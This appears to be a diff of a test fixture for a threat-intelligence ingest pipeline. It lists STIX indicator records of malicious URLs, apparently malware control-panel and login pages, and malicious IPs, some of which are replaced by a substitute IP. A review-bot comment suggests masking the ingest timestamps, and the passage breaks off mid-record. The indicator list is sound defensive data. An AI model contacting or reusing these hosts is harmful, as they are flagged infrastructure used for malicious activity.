'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.111Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16116,7 +16116,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386571594Z", + "ingested": "2021-12-13T08:38:40.024432500Z", "original": "{\"created\":\"2020-02-05T01:58:32.145Z\",\"description\":\"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--69661075-e6cb-4054-820c-61954757f0ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:58:32.145Z\",\"name\":\"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:32.145Z\"}", "category": "threat", "type": "indicator", @@ -16168,7 +16168,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386575742Z", + "ingested": "2021-12-13T08:38:40.024439500Z", "original": "{\"created\":\"2020-02-05T01:58:34.795Z\",\"description\":\"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime\",\"id\":\"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.795Z\",\"name\":\"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.795Z\"}", "category": "threat", "type": "indicator", 
@@ -16219,7 +16219,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386580461Z", + "ingested": "2021-12-13T08:38:40.024446500Z", "original": "{\"created\":\"2020-02-05T01:58:34.836Z\",\"description\":\"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-05T01:58:34.836Z\",\"name\":\"mal_url: http://domainmanagerz.net/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://domainmanagerz.net/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:34.836Z\"}", "category": "threat", "type": "indicator", @@ -16271,7 +16271,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386585030Z", + "ingested": "2021-12-13T08:38:40.024453400Z", "original": "{\"created\":\"2020-02-05T01:58:41.381Z\",\"description\":\"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:58:41.381Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:41.381Z\"}", "category": "threat", "type": "indicator", 
@@ -16323,7 +16323,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386589548Z", + "ingested": "2021-12-13T08:38:40.024460500Z", "original": "{\"created\":\"2020-02-05T01:58:59.279Z\",\"description\":\"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b845a78e-d141-455e-92ff-df401787a3cd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-05T01:58:59.279Z\",\"name\":\"mal_url: http://samundarmarine.com/denty/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samundarmarine.com/denty/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:58:59.279Z\"}", "category": "threat", "type": "indicator", @@ -16375,7 +16375,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386594057Z", + "ingested": "2021-12-13T08:38:40.024467500Z", "original": "{\"created\":\"2020-02-05T01:59:03.426Z\",\"description\":\"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime\",\"id\":\"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-05T01:59:03.426Z\",\"name\":\"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:03.426Z\"}", "category": "threat", "type": "indicator", 
@@ -16394,7 +16394,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 138.201.56.185", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime", "modified": "2020-02-05T01:59:04.695Z", "valid_from": "2020-02-05T01:59:04.695Z", @@ -16416,12 +16416,12 @@ "first_seen": "2020-02-05T01:59:04.695Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "138.201.56.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386598455Z", - "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 138.201.56.185\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '138.201.56.185']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", + "ingested": "2021-12-13T08:38:40.024476500Z", + "original": "{\"created\":\"2020-02-05T01:59:04.695Z\",\"description\":\"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--57e76166-d475-4027-b2d9-b4910c5b0747\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-05T01:59:04.695Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:04.695Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16472,7 +16472,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386602783Z", + "ingested": "2021-12-13T08:38:40.024483300Z", "original": "{\"created\":\"2020-02-05T01:59:06.271Z\",\"description\":\"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-05T01:59:06.271Z\",\"name\":\"mal_url: http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:06.271Z\"}", "category": "threat", "type": "indicator", @@ -16524,7 +16524,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386606971Z", + "ingested": "2021-12-13T08:38:40.024486700Z", "original": "{\"created\":\"2020-02-05T01:59:24.611Z\",\"description\":\"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-05T01:59:24.611Z\",\"name\":\"mal_url: http://ipblasta.com/kmaker/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ipblasta.com/kmaker/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:24.611Z\"}", "category": "threat", "type": "indicator", 
@@ -16576,7 +16576,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386611189Z", + "ingested": "2021-12-13T08:38:40.024491700Z", "original": "{\"created\":\"2020-02-05T01:59:31.341Z\",\"description\":\"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-05T01:59:31.341Z\",\"name\":\"mal_url: http://softtouchcollars.com/origin/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/origin/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:31.341Z\"}", "category": "threat", "type": "indicator", @@ -16595,7 +16595,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.241.216.92", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-02-05T01:59:47.461Z", "valid_from": "2020-02-05T01:59:47.461Z", 
@@ -16617,12 +16617,12 @@ "first_seen": "2020-02-05T01:59:47.461Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.241.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386615497Z", - "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 162.241.216.92\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.241.216.92']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", + "ingested": "2021-12-13T08:38:40.024497400Z", + "original": "{\"created\":\"2020-02-05T01:59:47.461Z\",\"description\":\"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-05T01:59:47.461Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.461Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16640,7 +16640,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 89.208.84.96", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime", "modified": "2020-02-05T01:59:47.506Z", "valid_from": "2020-02-05T01:59:47.506Z", 
@@ -16662,12 +16662,12 @@ "first_seen": "2020-02-05T01:59:47.506Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "89.208.84.96" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386619835Z", - "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.208.84.96\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.208.84.96']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", + "ingested": "2021-12-13T08:38:40.024503600Z", + "original": "{\"created\":\"2020-02-05T01:59:47.506Z\",\"description\":\"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-05T01:59:47.506Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T01:59:47.506Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16718,7 +16718,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386624153Z", + "ingested": "2021-12-13T08:38:40.024507400Z", "original": "{\"created\":\"2020-02-05T02:00:16.19Z\",\"description\":\"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-05T02:00:16.19Z\",\"name\":\"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:16.19Z\"}", "category": "threat", "type": "indicator", @@ -16770,7 +16770,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386628581Z", + "ingested": "2021-12-13T08:38:40.024512600Z", "original": "{\"created\":\"2020-02-05T02:00:23.009Z\",\"description\":\"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-05T02:00:23.009Z\",\"name\":\"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:23.009Z\"}", "category": "threat", "type": "indicator", 
@@ -16822,7 +16822,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386633100Z", + "ingested": "2021-12-13T08:38:40.024535600Z", "original": "{\"created\":\"2020-02-05T02:00:29.679Z\",\"description\":\"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:00:29.679Z\",\"name\":\"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:29.679Z\"}", "category": "threat", "type": "indicator", @@ -16874,7 +16874,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386637398Z", + "ingested": "2021-12-13T08:38:40.024540Z", "original": "{\"created\":\"2020-02-05T02:00:52.297Z\",\"description\":\"TS ID: 55287965570; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--b4e748c7-0beb-4b0f-a234-938ad9a6b884\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-05T02:00:52.297Z\",\"name\":\"mal_url: http://futuracosmetic.com/frank/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://futuracosmetic.com/frank/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:52.297Z\"}", "category": "threat", "type": "indicator", 
@@ -16926,7 +16926,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386642007Z", + "ingested": "2021-12-13T08:38:40.024544400Z", "original": "{\"created\":\"2020-02-05T02:00:57.141Z\",\"description\":\"TS ID: 55287965588; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--320c2f41-7546-4aa7-afef-5188df844448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:00:57.141Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/tel/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/tel/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.141Z\"}", "category": "threat", "type": "indicator", @@ -16978,7 +16978,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386646285Z", + "ingested": "2021-12-13T08:38:40.024550Z", "original": "{\"created\":\"2020-02-05T02:00:57.172Z\",\"description\":\"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime\",\"id\":\"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-05T02:00:57.172Z\",\"name\":\"mal_url: http://video-ld.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://video-ld.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.172Z\"}", "category": "threat", "type": "indicator", 
@@ -17030,7 +17030,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386650613Z", + "ingested": "2021-12-13T08:38:40.024554800Z", "original": "{\"created\":\"2020-02-05T02:00:57.733Z\",\"description\":\"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-05T02:00:57.733Z\",\"name\":\"mal_url: http://nortonlilly.info/emma/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/emma/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:00:57.733Z\"}", "category": "threat", "type": "indicator", @@ -17082,7 +17082,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386655001Z", + "ingested": "2021-12-13T08:38:40.024561400Z", "original": "{\"created\":\"2020-02-05T02:01:03.604Z\",\"description\":\"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--e396f12a-867b-4e91-8796-d042aef55ce3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-05T02:01:03.604Z\",\"name\":\"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:03.604Z\"}", "category": "threat", "type": "indicator", 
@@ -17101,7 +17101,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 170.106.50.37", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime", "modified": "2020-02-05T02:01:16.051Z", "valid_from": "2020-02-05T02:01:16.051Z", 
@@ -17123,12 +17123,12 @@ "first_seen": "2020-02-05T02:01:16.051Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "170.106.50.37" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386659950Z", - "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 170.106.50.37\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '170.106.50.37']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", + "ingested": "2021-12-13T08:38:40.024568600Z", + "original": "{\"created\":\"2020-02-05T02:01:16.051Z\",\"description\":\"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-05T02:01:16.051Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:16.051Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -17179,7 +17179,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386664399Z", + "ingested": "2021-12-13T08:38:40.024576Z", "original": "{\"created\":\"2020-02-05T02:01:18.261Z\",\"description\":\"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--8dff68c1-1114-4092-9f29-f655f27d2337\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.261Z\",\"name\":\"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.261Z\"}", "category": "threat", "type": "indicator", @@ -17231,7 +17231,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386668867Z", + "ingested": "2021-12-13T08:38:40.024583200Z", "original": "{\"created\":\"2020-02-05T02:01:18.285Z\",\"description\":\"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--19636e7d-febc-4ae1-879a-28af129c19b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-60\"],\"modified\":\"2020-02-05T02:01:18.285Z\",\"name\":\"mal_url: http://credoaz.com/journals/webpanel/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://credoaz.com/journals/webpanel/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:18.285Z\"}", "category": "threat", "type": "indicator", 
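Review bot: The -17179 and -17231 hunks change only `"ingested"`, a wall-clock value written by the ingest node that will churn every time this expected file is regenerated; the -17283, -17385, -17482, -17579, -17681, -17733, -17784, -17836, -17888, -17939, -17991, -18094, -18145, -18196, -18343 and -18394 hunks are the same. These lines carry no information about the pipeline under test and make the intentional IP substitutions harder to spot in review. If the test runner supports masking or dropping dynamic fields from the comparison, excluding `event.ingested` would keep future regenerations limited to real changes.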
@@ -17283,7 +17283,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386673215Z", + "ingested": "2021-12-13T08:38:40.024590500Z", "original": "{\"created\":\"2020-02-05T02:01:21.73Z\",\"description\":\"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--593225c7-68c8-44db-82bf-2c550931a60c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-05T02:01:21.73Z\",\"name\":\"mal_url: http://bestlogs.myjino.ru/best/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-05T02:01:21.73Z\"}", "category": "threat", "type": "indicator", @@ -17302,7 +17302,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://46.229.215.123/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime", "modified": "2020-02-06T02:10:08.953Z", "valid_from": "2020-02-06T02:10:08.953Z", 
@@ -17326,16 +17326,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://46.229.215.123/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "46.229.215.123", - "full": "http://46.229.215.123/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386677654Z", - "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: http://46.229.215.123/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://46.229.215.123/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", + "ingested": "2021-12-13T08:38:40.024597500Z", + "original": "{\"created\":\"2020-02-06T02:10:08.953Z\",\"description\":\"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime\",\"id\":\"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:10:08.953Z\",\"name\":\"mal_url: 